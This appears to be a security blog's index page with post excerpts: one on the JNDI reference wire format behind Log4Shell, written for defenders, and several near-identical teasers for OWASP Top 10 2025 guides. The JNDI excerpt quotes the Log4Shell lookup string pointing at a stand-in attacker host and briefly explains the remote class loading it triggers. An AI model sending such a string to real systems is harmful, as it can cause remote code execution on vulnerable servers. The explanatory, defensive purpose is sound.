Hand-rolling the JNDI Reference: what the JVM actually deserializes

Quick note before we start: this is about the wire format, for defenders and people doing authorized testing. There’s no turnkey exploit here, no gadget chain, nothing you can copy-paste to pop a box. The point is to know what the bytes look like so you can spot them. You’ve seen the Log4Shell string a hundred times: ${jndi:ldap://attacker.example/a} And you’ve probably read the stock explanation that goes with it: the server does a JNDI lookup, the attacker’s LDAP server hands back a reference to a remote class, and the JVM downloads and runs it. ...

July 1, 2026 · Carl Sampson

OWASP A05: Injection Prevention Guide 2025

🛡️ OWASP Top 10 2025 Series Complete guides to modern web application security vulnerabilities 📚 Complete Guide OWASP Top 10 2025: Complete Developer Guide Comprehensive overview of all vulnerabilities, rankings, and modern threat landscape 🎯 Individual Vulnerability Guides A01: Broken Access Control Includes SSRF A02: Security Misconfiguration Jumped to #2 A03: Software Supply Chain Failures New in 2025 A04: Cryptographic Failures A05: Injection A06: Vulnerable Components Coming Next A07: Authentication Failures Coming Soon A08: Integrity Failures Coming Soon A09: Logging & Monitoring Coming Soon A10: Exception Handling Coming Soon 👨‍💻 Written by Carl Sampson • Security researcher with 15+ years experience • OWASP Indianapolis Chapter founder ...

June 30, 2026 · Carl Sampson

OWASP A04: Cryptographic Failures Guide 2025

🛡️ OWASP Top 10 2025 Series Complete guides to modern web application security vulnerabilities 📚 Complete Guide OWASP Top 10 2025: Complete Developer Guide Comprehensive overview of all vulnerabilities, rankings, and modern threat landscape 🎯 Individual Vulnerability Guides A01: Broken Access Control Includes SSRF A02: Security Misconfiguration Jumped to #2 A03: Software Supply Chain Failures New in 2025 A04: Cryptographic Failures A05: Injection A06: Vulnerable Components Coming Next A07: Authentication Failures Coming Soon A08: Integrity Failures Coming Soon A09: Logging & Monitoring Coming Soon A10: Exception Handling Coming Soon 👨‍💻 Written by Carl Sampson • Security researcher with 15+ years experience • OWASP Indianapolis Chapter founder ...

June 30, 2026 · Carl Sampson

OWASP A03: Software Supply Chain Failures Guide 2025

🛡️ OWASP Top 10 2025 Series Complete guides to modern web application security vulnerabilities 📚 Complete Guide OWASP Top 10 2025: Complete Developer Guide Comprehensive overview of all vulnerabilities, rankings, and modern threat landscape 🎯 Individual Vulnerability Guides A01: Broken Access Control Includes SSRF A02: Security Misconfiguration Jumped to #2 A03: Software Supply Chain Failures New in 2025 A04: Cryptographic Failures A05: Injection A06: Vulnerable Components Coming Next A07: Authentication Failures Coming Soon A08: Integrity Failures Coming Soon A09: Logging & Monitoring Coming Soon A10: Exception Handling Coming Soon 👨‍💻 Written by Carl Sampson • Security researcher with 15+ years experience • OWASP Indianapolis Chapter founder ...

June 30, 2026 · Carl Sampson

OWASP A02: Security Misconfiguration Guide 2025

🛡️ OWASP Top 10 2025 Series Complete guides to modern web application security vulnerabilities 📚 Complete Guide OWASP Top 10 2025: Complete Developer Guide Comprehensive overview of all vulnerabilities, rankings, and modern threat landscape 🎯 Individual Vulnerability Guides A01: Broken Access Control Includes SSRF A02: Security Misconfiguration Jumped to #2 A03: Software Supply Chain Failures New in 2025 A04: Cryptographic Failures A05: Injection A06: Vulnerable Components Coming Next A07: Authentication Failures Coming Soon A08: Integrity Failures Coming Soon A09: Logging & Monitoring Coming Soon A10: Exception Handling Coming Soon 👨‍💻 Written by Carl Sampson • Security researcher with 15+ years experience • OWASP Indianapolis Chapter founder ...

May 5, 2026 · Carl Sampson